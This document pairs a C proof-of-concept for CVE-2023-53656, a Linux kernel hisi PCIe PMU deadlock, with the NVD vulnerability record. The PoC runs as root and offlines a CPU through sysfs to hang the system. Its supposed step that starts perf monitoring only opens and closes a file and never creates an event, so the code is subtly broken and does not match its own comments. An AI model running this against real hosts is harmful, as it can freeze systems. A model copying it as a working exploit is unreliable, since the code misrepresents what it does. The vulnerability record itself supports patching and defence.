CVE-2023-53656

// PoC for CVE-2023-53656 // Trigger the deadlock by offlining a CPU that has active hisi PCIe PMU events // Requires: hisi_pcie_pmu module loaded, root or CAP_SYS_ADMIN privileges #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <sys/syscall.h> #include <errno.h> // Step 1: Open the hisi PCIe PMU device and start perf monitoring on CPU 0 static int start_perf_monitoring(int cpu) { char path[256]; char buf[16]; int fd; // Open the PMU device for the target CPU snprintf(path, sizeof(path), "/sys/devices/hisi_pcie_pmu%d/events/event0", cpu); fd = open(path, O_RDONLY); if (fd < 0) { perror("[-] Failed to open PMU device"); return -1; } close(fd); printf("[+] PMU device opened for CPU %d\n", cpu); return 0; } // Step 2: Offline the CPU to trigger the teardown callback static int offline_cpu(int cpu) { char path[256]; char buf[16]; int fd, ret; snprintf(path, sizeof(path), "/sys/devices/system/cpu/cpu%d/online", cpu); fd = open(path, O_WRONLY); if (fd < 0) { perror("[-] Failed to open CPU online file"); return -1; } // Write '0' to offline the CPU - this triggers the cpuhp teardown ret = write(fd, "0", 1); if (ret < 0) { perror("[-] Failed to offline CPU"); close(fd); return -1; } close(fd); printf("[+] CPU %d offline command sent\n", cpu); return 0; } int main(int argc, char *argv[]) { int target_cpu = 0; if (argc > 1) { target_cpu = atoi(argv[1]); } printf("[*] CVE-2023-53656 PoC - hisi PCIe PMU CPU teardown deadlock\n"); printf("[*] Target CPU: %d\n", target_cpu); // Check if we have permission if (geteuid() != 0) { printf("[-] This PoC requires root privileges\n"); return 1; } // Start perf monitoring on the target CPU if (start_perf_monitoring(target_cpu) != 0) { printf("[-] PMU not available, trying to trigger anyway...\n"); } // Trigger the CPU offline to cause the deadlock printf("[*] Triggering CPU teardown...\n"); if (offline_cpu(target_cpu) != 0) { printf("[-] Failed to offline CPU\n"); return 1; } printf("[+] System may now be in deadlock state\n"); return 0; }

{"cve": {"id": "CVE-2023-53656", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:49.213", "lastModified": "2026-02-03T22:24:05.590", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrivers/perf: hisi: Don't migrate perf to the CPU going to teardown\n\nThe driver needs to migrate the perf context if the current using CPU going\nto teardown. By the time calling the cpuhp::teardown() callback the\ncpu_online_mask() hasn't updated yet and still includes the CPU going to\nteardown. In current driver's implementation we may migrate the context\nto the teardown CPU and leads to the below calltrace:\n\n...\n[ 368.104662][ T932] task:cpuhp/0 state:D stack: 0 pid: 15 ppid: 2 flags:0x00000008\n[ 368.113699][ T932] Call trace:\n[ 368.116834][ T932] __switch_to+0x7c/0xbc\n[ 368.120924][ T932] __schedule+0x338/0x6f0\n[ 368.125098][ T932] schedule+0x50/0xe0\n[ 368.128926][ T932] schedule_preempt_disabled+0x18/0x24\n[ 368.134229][ T932] __mutex_lock.constprop.0+0x1d4/0x5dc\n[ 368.139617][ T932] __mutex_lock_slowpath+0x1c/0x30\n[ 368.144573][ T932] mutex_lock+0x50/0x60\n[ 368.148579][ T932] perf_pmu_migrate_context+0x84/0x2b0\n[ 368.153884][ T932] hisi_pcie_pmu_offline_cpu+0x90/0xe0 [hisi_pcie_pmu]\n[ 368.160579][ T932] cpuhp_invoke_callback+0x2a0/0x650\n[ 368.165707][ T932] cpuhp_thread_fun+0xe4/0x190\n[ 368.170316][ T932] smpboot_thread_fn+0x15c/0x1a0\n[ 368.175099][ T932] kthread+0x108/0x13c\n[ 368.179012][ T932] ret_from_fork+0x10/0x18\n...\n\nUse function cpumask_any_but() to find one correct active cpu to fixes\nthis issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.17", "versionEndExcluding": "6.1.39", "matchCriteriaId": "BDC6C41A-81F5-4532-A42F-F87AD7387727"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.13", "matchCriteriaId": "95CB4836-7F5D-4C20-B025-8E046EC87B78"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4", "versionEndExcluding": "6.4.4", "matchCriteriaId": "6AB81046-CB69-4115-924C-963B37C41385"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/7a6a9f1c5a0a875a421db798d4b2ee022dc1ee1a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b64569897d86b611befbb895d815280fea94e1ed", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/be9c8c9c84b6d25a7b7d39954030aba6f759feb6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f564e543a43d0f1cabac791672c8a6fc78ce12d0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}